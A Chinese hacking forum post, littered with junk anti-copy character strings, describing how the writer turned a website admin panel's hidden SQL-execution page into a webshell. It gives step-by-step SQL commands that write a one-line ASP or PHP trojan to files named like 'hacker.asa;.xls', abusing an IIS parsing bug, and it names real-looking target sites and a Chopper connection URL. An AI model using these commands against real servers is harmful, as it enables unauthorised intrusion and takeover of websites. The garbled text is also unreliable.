好不容易进了后台,发现啥上传啊。备份啊多木有。" b; J9 H# K0 P) Q
webshell一直拿不到。后来翻了一下源码。有一个执行SQL命令的9 y6 k8 ^1 j' W9 G0 x7 h2 t
文件。可后台没显示这功能。直接填上文件名字,执行命令的选项出来了,9 ^8 ^; s6 d3 B' l9 T
然后就试用了下面的命令导出一句话木马。没想到成功了。命令方法如下:7 W8 N0 a! s8 v! I J5 p: i
1.create table cmd (a varchar(50))# `9 i( h! m, Q) y8 l
2.insert into cmd (a) values (‘‘)
6 `& [* Q* u1 A: X! j! p3.select * into [a] in ‘D:\wwwroot\www.koohik.com\hacker.asa;.xls’ ‘excel 4.0;’ from cmd
( c9 E1 {) \2 w# n% ?" h(把表cmd的内容导出为物理路径的一个EXCEL文件)& k7 Q: O" ~+ ~# l
4.drop table cmd) ^* V/ f! O4 W; h5 J" U# ]- V4 W
利用IIS的BUG成功拿到了WEBSHELL。
) |/ Q, r% [% q3 G& U$ O% I8 B
$ |: m7 J4 t7 ~: X8 R, y3 F1 L直接菜刀里连接http://www.chouwazi.com/data/xiao.asp;xiao.xls一句话
4 U" l4 v4 D# K6 {( q5 A% f5 E4 U! i: Q1 Y: D, |; ?! X# J
SQL语句意思解释:7 |! {5 ? M) F0 M# ?7 m" w& K
第一句
8 K, \$ m2 g1 C, u M. @' ]( S 建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为50
h4 `& J `) f2 E5 ~
- Q8 U; q! h; s+ T( [+ I 第二句5 a' b% Z& f9 }/ n
在表cmd的a字段插入一句话木马5 [& F! i/ d/ y7 U4 }
第三句
, Z% q$ C! Z3 c& k4 N3 G 把cmd表a的内容导出到路径e:\host\chouwazi.com\web\data\的EXCEL文件* z9 {: b( \( f5 j
3 A$ B4 B8 U; p( ?" D* Q' @/ ?6 h
第四句
8 [* H* w$ A) T D% |% x8 N 删除建立的cmd表
, X3 k6 n' J+ ]/ K7 r" ]
$ j& D5 ~8 m/ t( A! t 以下内容为测试:
8 O1 j- k# m0 T0 Q Access利用后台SQL执行命令功能导出WebShell:
+ L. o( N1 w) P3 m4 [ 这个更简单:. u8 g& [# q# M2 p0 S' D$ g2 l
[ol][li]Select 'asp一句话木马' into [vote] in 'd:/chouwazi.com/x.asp;.xls' 'excel 8.0;' from vote [/li][/ol]
; ~! |& o! h6 j8 R 或者
# I$ V8 e1 |& C% k- V5 A, ^ [ol][li]Select 'php一句话木马' into outfile 'F:/wwwroot/chouwazi.com/eval.php'; [/li][/ol]- L8 H* ?: Z2 x2 S3 ?, j
1 }$ B% c \' n- L2 M" K
后台有执行SQL语句功能(vote为已知表段)
7 O, W# y- E6 P1 l ~" U9 v 希望对大家有所帮助拿shell的又一个思路
, g% T7 L9 D& j7 F |